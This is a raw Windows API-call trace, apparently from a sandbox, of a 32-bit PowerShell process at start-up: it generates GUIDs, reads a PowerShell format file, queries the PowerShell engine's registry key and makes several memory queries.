	[0226.736] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xf0d930e1, Data2=0x9761, Data3=0x41aa, Data4=([0]=0xb2, [1]=0x37, [2]=0xae, [3]=0x34, [4]=0xfa, [5]=0x8f, [6]=0xba, [7]=0xbd))) returned 0x0
	[0226.741] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xa2199f08, Data2=0x27f7, Data3=0x488b, Data4=([0]=0x8c, [1]=0xf1, [2]=0xb7, [3]=0xf6, [4]=0xd, [5]=0xf, [6]=0xa0, [7]=0x47))) returned 0x0
	[0226.745] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xc11b0588, Data2=0xf8bf, Data3=0x4928, Data4=([0]=0x95, [1]=0xb0, [2]=0xf5, [3]=0x20, [4]=0xd7, [5]=0x64, [6]=0x11, [7]=0x8b))) returned 0x0
	[0226.746] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xa5f3b80d, Data2=0xe5a, Data3=0x497c, Data4=([0]=0xb1, [1]=0x2c, [2]=0x95, [3]=0x84, [4]=0x11, [5]=0xd0, [6]=0x18, [7]=0xbb))) returned 0x0
	[0226.746] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xc7b592, Data2=0x13ee, Data3=0x4edf, Data4=([0]=0xb0, [1]=0x9, [2]=0x2f, [3]=0x8, [4]=0x44, [5]=0x33, [6]=0xe9, [7]=0x33))) returned 0x0
	[0226.748] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x3d295082, Data2=0x20e1, Data3=0x44ec, Data4=([0]=0x8e, [1]=0xd0, [2]=0x9b, [3]=0x70, [4]=0x5f, [5]=0x3f, [6]=0x1c, [7]=0xac))) returned 0x0
	[0226.749] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x26631676, Data2=0x9d7b, Data3=0x4953, Data4=([0]=0x96, [1]=0xd9, [2]=0xed, [3]=0xd6, [4]=0x84, [5]=0xd7, [6]=0xa2, [7]=0xb3))) returned 0x0
	[0226.750] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xabfe618c, Data2=0x58b1, Data3=0x4373, Data4=([0]=0xb2, [1]=0x70, [2]=0x91, [3]=0xe0, [4]=0x3f, [5]=0x4c, [6]=0xce, [7]=0x60))) returned 0x0
	[0226.750] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x898c704f, Data2=0x638, Data3=0x4cdf, Data4=([0]=0xb7, [1]=0xcb, [2]=0x24, [3]=0x92, [4]=0x56, [5]=0xcd, [6]=0x90, [7]=0x2f))) returned 0x0
	[0226.750] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x77c69566, Data2=0xfb8b, Data3=0x4002, Data4=([0]=0x9e, [1]=0xfb, [2]=0x43, [3]=0xc5, [4]=0x66, [5]=0xfb, [6]=0x5f, [7]=0xe9))) returned 0x0
	[0226.751] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x358
	[0226.752] GetLastError () returned 0x0
	[0226.752] GetFileType (hFile=0x358) returned 0x1
	[0226.752] SetErrorMode (uMode=0x1) returned 0x1
	[0226.752] GetFileType (hFile=0x358) returned 0x1
	[0226.752] ReadFile (in: hFile=0x358, lpBuffer=0x32062e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32062e4*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.753] GetLastError () returned 0x0
	[0226.754] ReadFile (in: hFile=0x358, lpBuffer=0x32062e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32062e4*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.754] GetLastError () returned 0x0
	[0226.754] ReadFile (in: hFile=0x358, lpBuffer=0x32062e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32062e4*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.754] GetLastError () returned 0x0
	[0226.755] ReadFile (in: hFile=0x358, lpBuffer=0x32062e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32062e4*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.919] GetLastError () returned 0x0
	[0226.919] ReadFile (in: hFile=0x358, lpBuffer=0x32062e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32062e4*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.920] GetLastError () returned 0x0
	[0226.921] ReadFile (in: hFile=0x358, lpBuffer=0x32062e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32062e4*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.921] GetLastError () returned 0x0
	[0226.921] ReadFile (in: hFile=0x358, lpBuffer=0x32062e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32062e4*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.921] GetLastError () returned 0x0
	[0226.921] ReadFile (in: hFile=0x358, lpBuffer=0x32062e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32062e4*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.922] GetLastError () returned 0x0
	[0226.922] ReadFile (in: hFile=0x358, lpBuffer=0x32062e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32062e4*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.922] GetLastError () returned 0x0
	[0226.923] ReadFile (in: hFile=0x358, lpBuffer=0x32062e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32062e4*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.923] GetLastError () returned 0x0
	[0226.923] ReadFile (in: hFile=0x358, lpBuffer=0x32062e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32062e4*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.923] GetLastError () returned 0x0
	[0226.924] ReadFile (in: hFile=0x358, lpBuffer=0x32062e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32062e4*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.924] GetLastError () returned 0x0
	[0226.924] ReadFile (in: hFile=0x358, lpBuffer=0x32062e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32062e4*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.924] GetLastError () returned 0x0
	[0226.924] ReadFile (in: hFile=0x358, lpBuffer=0x32062e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32062e4*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.924] GetLastError () returned 0x0
	[0226.924] ReadFile (in: hFile=0x358, lpBuffer=0x32062e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32062e4*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.924] GetLastError () returned 0x0
	[0226.925] ReadFile (in: hFile=0x358, lpBuffer=0x32062e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32062e4*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.925] GetLastError () returned 0x0
	[0226.925] ReadFile (in: hFile=0x358, lpBuffer=0x32062e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32062e4*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.925] GetLastError () returned 0x0
	[0226.927] ReadFile (in: hFile=0x358, lpBuffer=0x32062e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32062e4*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.927] GetLastError () returned 0x0
	[0226.928] ReadFile (in: hFile=0x358, lpBuffer=0x32062e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32062e4*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.928] GetLastError () returned 0x0
	[0226.928] ReadFile (in: hFile=0x358, lpBuffer=0x32062e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32062e4*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.928] GetLastError () returned 0x0
	[0226.928] ReadFile (in: hFile=0x358, lpBuffer=0x32062e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32062e4*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.928] GetLastError () returned 0x0
	[0226.928] ReadFile (in: hFile=0x358, lpBuffer=0x32062e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32062e4*, lpNumberOfBytesRead=0x29e424*=0xe67, lpOverlapped=0x0) returned 1
	[0226.928] GetLastError () returned 0x0
	[0226.929] ReadFile (in: hFile=0x358, lpBuffer=0x32058eb, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32058eb*, lpNumberOfBytesRead=0x29e424*=0x0, lpOverlapped=0x0) returned 1
	[0226.929] GetLastError () returned 0x0
	[0226.929] ReadFile (in: hFile=0x358, lpBuffer=0x32062e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x32062e4*, lpNumberOfBytesRead=0x29e424*=0x0, lpOverlapped=0x0) returned 1
	[0226.929] GetLastError () returned 0x0
	[0226.929] CloseHandle (hObject=0x358) returned 1
	[0226.929] GetLastError () returned 0x0
	[0226.929] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e3a8 | out: phkResult=0x29e3a8*=0x358) returned 0x0
	[0226.930] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e3f0, lpData=0x0, lpcbData=0x29e3ec*=0x0 | out: lpType=0x29e3f0*=0x1, lpData=0x0, lpcbData=0x29e3ec*=0x56) returned 0x0
	[0226.930] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e3f0, lpData=0x7a4288, lpcbData=0x29e3ec*=0x56 | out: lpType=0x29e3f0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x29e3ec*=0x56) returned 0x0
	[0226.930] RegCloseKey (hKey=0x358) returned 0x0
	[0226.934] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xefc8bc7e, Data2=0x6cbe, Data3=0x44a6, Data4=([0]=0xb2, [1]=0xda, [2]=0x73, [3]=0xf7, [4]=0x9b, [5]=0x50, [6]=0x5b, [7]=0xff))) returned 0x0
	[0226.934] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xf3cd3463, Data2=0xaf78, Data3=0x4f74, Data4=([0]=0xbb, [1]=0xb4, [2]=0x90, [3]=0xb8, [4]=0xe7, [5]=0x62, [6]=0xbc, [7]=0xde))) returned 0x0
	[0226.934] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x7ab1405c, Data2=0xdd56, Data3=0x4780, Data4=([0]=0xb8, [1]=0xfd, [2]=0x39, [3]=0x3c, [4]=0xfa, [5]=0x26, [6]=0x68, [7]=0x78))) returned 0x0
	[0226.935] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x7301e471, Data2=0xee4b, Data3=0x4c1d, Data4=([0]=0xa1, [1]=0xb5, [2]=0x92, [3]=0x24, [4]=0x44, [5]=0xf6, [6]=0x9b, [7]=0xd2))) returned 0x0
	[0226.935] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x394d54c9, Data2=0x4014, Data3=0x4ea0, Data4=([0]=0xa5, [1]=0x1d, [2]=0xb3, [3]=0x5e, [4]=0xff, [5]=0x99, [6]=0x8d, [7]=0x5d))) returned 0x0
	[0226.935] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x496ccd13, Data2=0xbb95, Data3=0x4ddf, Data4=([0]=0xb0, [1]=0x1a, [2]=0xbe, [3]=0xcc, [4]=0xe4, [5]=0x97, [6]=0x21, [7]=0x3))) returned 0x0
	[0226.935] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x796c7e61, Data2=0xad4a, Data3=0x4f8a, Data4=([0]=0xae, [1]=0xc9, [2]=0x7b, [3]=0xc9, [4]=0xd8, [5]=0xb0, [6]=0xa7, [7]=0x41))) returned 0x0
	[0226.936] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x876492de, Data2=0x28c3, Data3=0x4107, Data4=([0]=0xa6, [1]=0x49, [2]=0x8, [3]=0x3e, [4]=0x2c, [5]=0x95, [6]=0x25, [7]=0xe9))) returned 0x0
	[0226.936] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x689bd4c9, Data2=0xde4f, Data3=0x4001, Data4=([0]=0xbc, [1]=0xe3, [2]=0x18, [3]=0xc2, [4]=0x96, [5]=0x6d, [6]=0xf7, [7]=0x2))) returned 0x0
	[0226.936] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x5d5e0326, Data2=0x2494, Data3=0x4b62, Data4=([0]=0xae, [1]=0x75, [2]=0x32, [3]=0x5c, [4]=0x18, [5]=0xa9, [6]=0x3e, [7]=0x7c))) returned 0x0
	[0226.936] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x4f6a0f4e, Data2=0x1a4, Data3=0x4bb3, Data4=([0]=0xa7, [1]=0xf8, [2]=0xdd, [3]=0xfe, [4]=0xdc, [5]=0x1b, [6]=0xe7, [7]=0xe0))) returned 0x0
	[0226.937] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x37de1da3, Data2=0x747c, Data3=0x4089, Data4=([0]=0x99, [1]=0xb, [2]=0x73, [3]=0x72, [4]=0x6, [5]=0x74, [6]=0x0, [7]=0xd5))) returned 0x0
	[0226.937] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xa1e1f6b2, Data2=0x2caf, Data3=0x4b08, Data4=([0]=0x98, [1]=0x73, [2]=0x84, [3]=0xb, [4]=0x25, [5]=0xb8, [6]=0x81, [7]=0x63))) returned 0x0
	[0226.937] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xb1855999, Data2=0x9e11, Data3=0x4f3c, Data4=([0]=0xb3, [1]=0x4d, [2]=0xdc, [3]=0xc, [4]=0xcf, [5]=0xa2, [6]=0xb6, [7]=0x45))) returned 0x0
	[0226.937] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x1c27190a, Data2=0x6ed2, Data3=0x49c8, Data4=([0]=0xbc, [1]=0xb, [2]=0xfe, [3]=0x74, [4]=0x78, [5]=0x19, [6]=0x1e, [7]=0x83))) returned 0x0
	[0226.937] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x43083fa1, Data2=0x95ea, Data3=0x4d74, Data4=([0]=0xbf, [1]=0xf5, [2]=0x9b, [3]=0xc, [4]=0xf, [5]=0x77, [6]=0x0, [7]=0x2e))) returned 0x0
	[0226.937] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xbbe4ba43, Data2=0x5bcd, Data3=0x4bd1, Data4=([0]=0x8a, [1]=0x48, [2]=0xf7, [3]=0x33, [4]=0xa9, [5]=0x61, [6]=0x79, [7]=0xa6))) returned 0x0
	[0226.938] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xd8b87e8c, Data2=0xe886, Data3=0x4e48, Data4=([0]=0xbc, [1]=0x4c, [2]=0x19, [3]=0xda, [4]=0xf9, [5]=0xd0, [6]=0xaf, [7]=0xc8))) returned 0x0
	[0226.938] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x4943849e, Data2=0x9105, Data3=0x459b, Data4=([0]=0xa1, [1]=0x9, [2]=0x2d, [3]=0x54, [4]=0xa, [5]=0x63, [6]=0xe6, [7]=0x77))) returned 0x0
	[0226.939] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x7b5ca424, Data2=0x8b6f, Data3=0x427e, Data4=([0]=0xae, [1]=0x43, [2]=0xc, [3]=0x8d, [4]=0xad, [5]=0x3e, [6]=0xd2, [7]=0x6d))) returned 0x0
	[0226.939] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x562aa704, Data2=0xaf21, Data3=0x4176, Data4=([0]=0xbd, [1]=0x73, [2]=0xf3, [3]=0x70, [4]=0x67, [5]=0x8d, [6]=0x8b, [7]=0x2f))) returned 0x0
	[0226.939] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x50f3e99, Data2=0x6df5, Data3=0x4975, Data4=([0]=0x8e, [1]=0xe3, [2]=0xe8, [3]=0xb6, [4]=0x3c, [5]=0x10, [6]=0x91, [7]=0x22))) returned 0x0
	[0226.940] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xd02d00f3, Data2=0x79b7, Data3=0x419e, Data4=([0]=0xbf, [1]=0x1, [2]=0x11, [3]=0x69, [4]=0xb6, [5]=0x6f, [6]=0x16, [7]=0x70))) returned 0x0
	[0226.940] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x5924de39, Data2=0xd3c7, Data3=0x4f48, Data4=([0]=0xa6, [1]=0xf8, [2]=0x41, [3]=0x1a, [4]=0xd4, [5]=0x20, [6]=0xbc, [7]=0xb9))) returned 0x0
	[0226.940] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xa788a6c, Data2=0x10a1, Data3=0x4438, Data4=([0]=0x84, [1]=0x12, [2]=0x49, [3]=0x9a, [4]=0x81, [5]=0x40, [6]=0xfa, [7]=0x1c))) returned 0x0
	[0226.940] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x34aeae7a, Data2=0x2ac0, Data3=0x43ca, Data4=([0]=0xab, [1]=0xdb, [2]=0x1c, [3]=0xb2, [4]=0x12, [5]=0x4b, [6]=0x20, [7]=0x55))) returned 0x0
	[0226.941] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x58ce4e2a, Data2=0xcaea, Data3=0x4752, Data4=([0]=0x80, [1]=0xcc, [2]=0x39, [3]=0x43, [4]=0x68, [5]=0xf0, [6]=0xfd, [7]=0x61))) returned 0x0
	[0226.941] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x9c210c35, Data2=0x63be, Data3=0x4122, Data4=([0]=0xa5, [1]=0x18, [2]=0x47, [3]=0xf3, [4]=0xf0, [5]=0x7, [6]=0x4f, [7]=0xa0))) returned 0x0
	[0226.941] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xe513e12a, Data2=0x9b90, Data3=0x4beb, Data4=([0]=0xb3, [1]=0x11, [2]=0x8, [3]=0x43, [4]=0x46, [5]=0x4d, [6]=0xad, [7]=0x8d))) returned 0x0
	[0226.941] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x46b36dc4, Data2=0xe653, Data3=0x4426, Data4=([0]=0x89, [1]=0x2b, [2]=0x49, [3]=0x37, [4]=0xbd, [5]=0xb6, [6]=0x52, [7]=0x8e))) returned 0x0
	[0226.941] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x84164e35, Data2=0xa2f, Data3=0x4955, Data4=([0]=0xab, [1]=0xd9, [2]=0x4f, [3]=0xc4, [4]=0xc5, [5]=0xc3, [6]=0xef, [7]=0x8c))) returned 0x0
	[0226.941] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x89bb26a9, Data2=0x7bbb, Data3=0x4554, Data4=([0]=0x84, [1]=0xd2, [2]=0xcb, [3]=0x3a, [4]=0x4e, [5]=0x6c, [6]=0xcc, [7]=0xbd))) returned 0x0
	[0226.942] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xe03a51f3, Data2=0x12b9, Data3=0x46b7, Data4=([0]=0xb8, [1]=0x3d, [2]=0xa, [3]=0xad, [4]=0x4d, [5]=0x20, [6]=0x33, [7]=0x2e))) returned 0x0
	[0226.942] VirtualQuery (in: lpAddress=0x29d170, lpBuffer=0x29e170, dwLength=0x1c | out: lpBuffer=0x29e170*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.946] VirtualQuery (in: lpAddress=0x29d170, lpBuffer=0x29e170, dwLength=0x1c | out: lpBuffer=0x29e170*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.951] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x36ab88f, Data2=0x5a50, Data3=0x4e0b, Data4=([0]=0x89, [1]=0xa5, [2]=0x43, [3]=0x6, [4]=0xaf, [5]=0xd1, [6]=0xdb, [7]=0xd3))) returned 0x0
	[0226.951] VirtualQuery (in: lpAddress=0x29d170, lpBuffer=0x29e170, dwLength=0x1c | out: lpBuffer=0x29e170*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.951] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xc77d742c, Data2=0xcbb2, Data3=0x4f94, Data4=([0]=0xb8, [1]=0x70, [2]=0xb8, [3]=0xa8, [4]=0x42, [5]=0x62, [6]=0x57, [7]=0xa7))) returned 0x0
	[0226.952] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x36eae8c3, Data2=0xe91f, Data3=0x44a2, Data4=([0]=0x85, [1]=0x2, [2]=0x3f, [3]=0xcd, [4]=0xd, [5]=0x1b, [6]=0xd5, [7]=0x7d))) returned 0x0
	[0226.952] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x8ae93248, Data2=0x58c0, Data3=0x4942, Data4=([0]=0x95, [1]=0x64, [2]=0xb6, [3]=0xbe, [4]=0xeb, [5]=0x51, [6]=0x9, [7]=0x96))) returned 0x0
	[0226.952] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xf4736c5d, Data2=0xa411, Data3=0x48b2, Data4=([0]=0xa8, [1]=0x60, [2]=0xf2, [3]=0x8a, [4]=0x39, [5]=0xef, [6]=0x78, [7]=0x9c))) returned 0x0
	[0226.953] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xd52784ee, Data2=0xfa2f, Data3=0x4f7d, Data4=([0]=0xa1, [1]=0xc0, [2]=0xc1, [3]=0x6c, [4]=0xe8, [5]=0x86, [6]=0x4b, [7]=0xdd))) returned 0x0
	[0226.953] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x43ec6229, Data2=0x9011, Data3=0x406b, Data4=([0]=0x96, [1]=0xe6, [2]=0x2f, [3]=0xfe, [4]=0x53, [5]=0xb7, [6]=0x2f, [7]=0xd0))) returned 0x0
	[0226.953] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x2fe2b67c, Data2=0x64de, Data3=0x4457, Data4=([0]=0xae, [1]=0x6d, [2]=0x1a, [3]=0x73, [4]=0x3d, [5]=0xc1, [6]=0x1e, [7]=0xdc))) returned 0x0
	[0226.954] VirtualQuery (in: lpAddress=0x29d150, lpBuffer=0x29e150, dwLength=0x1c | out: lpBuffer=0x29e150*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.954] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xda8269df, Data2=0x38d0, Data3=0x494d, Data4=([0]=0x90, [1]=0x52, [2]=0x28, [3]=0x66, [4]=0x97, [5]=0x74, [6]=0x68, [7]=0xff))) returned 0x0
	[0226.955] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x9d0eb386, Data2=0xafc0, Data3=0x4e6d, Data4=([0]=0x81, [1]=0xc3, [2]=0x60, [3]=0xd6, [4]=0x4b, [5]=0xba, [6]=0xf3, [7]=0x4f))) returned 0x0
	[0226.955] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x8cf6e5d0, Data2=0x262f, Data3=0x4dee, Data4=([0]=0xa2, [1]=0xa4, [2]=0x54, [3]=0xe1, [4]=0x23, [5]=0x9f, [6]=0x68, [7]=0xac))) returned 0x0
	[0226.955] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x395d544e, Data2=0x9945, Data3=0x4d41, Data4=([0]=0xb7, [1]=0xcf, [2]=0x95, [3]=0x9b, [4]=0x6c, [5]=0xdc, [6]=0xa, [7]=0x5b))) returned 0x0
	[0226.955] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x712879b3, Data2=0xd95a, Data3=0x419f, Data4=([0]=0x8c, [1]=0xd3, [2]=0x15, [3]=0x98, [4]=0x2e, [5]=0xf6, [6]=0x5b, [7]=0x71))) returned 0x0
	[0226.955] VirtualQuery (in: lpAddress=0x29d150, lpBuffer=0x29e150, dwLength=0x1c | out: lpBuffer=0x29e150*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.956] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x2cf0e845, Data2=0xdae5, Data3=0x4bac, Data4=([0]=0xa7, [1]=0x6e, [2]=0x37, [3]=0xb6, [4]=0xbe, [5]=0xf8, [6]=0x31, [7]=0x44))) returned 0x0
	[0226.956] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xa38554ea, Data2=0xd9ac, Data3=0x447d, Data4=([0]=0x8d, [1]=0xaf, [2]=0x1c, [3]=0xf7, [4]=0x2e, [5]=0xde, [6]=0xfb, [7]=0xc0))) returned 0x0
	[0226.956] VirtualQuery (in: lpAddress=0x29d178, lpBuffer=0x29e178, dwLength=0x1c | out: lpBuffer=0x29e178*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.956] VirtualQuery (in: lpAddress=0x29d178, lpBuffer=0x29e178, dwLength=0x1c | out: lpBuffer=0x29e178*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.956] VirtualQuery (in: lpAddress=0x29d178, lpBuffer=0x29e178, dwLength=0x1c | out: lpBuffer=0x29e178*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
